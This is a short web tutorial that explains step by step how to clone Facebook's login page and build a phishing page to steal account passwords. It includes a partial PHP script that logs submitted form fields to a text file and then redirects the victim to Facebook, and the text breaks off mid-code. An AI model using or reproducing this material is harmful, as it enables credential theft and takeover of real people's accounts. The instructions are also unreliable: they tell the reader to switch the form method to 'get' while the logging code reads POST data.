How to Hack Facebook Account Using phishing page
How to Hack Facebook Account Using phishing page Step 1: Go to Facebook.com Right click on the white space of the front page. Select “View Page source”. Copy the code to Notepad. ᗯⅈℕℂ Step2: Now find (Press ctrl +f) for “action=” in that code. You fill find the code like this: The big red ring that circles the action= you have to change. You have to change it to ‘action=”next.php” ‘. after you have done that, you should change the method (small red circle on the picture) to “get” instead of “post”, or else it will not work. Save the document as index.html ᗯⅈℕℂ Step 3: Now we need to create the “next.php” to store the password. so open the notepad and type the following code: <?php header(“Location: http://www.Facebook.com/login.php “); $handle = fopen(“pswrds.txt”, “a”); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite(...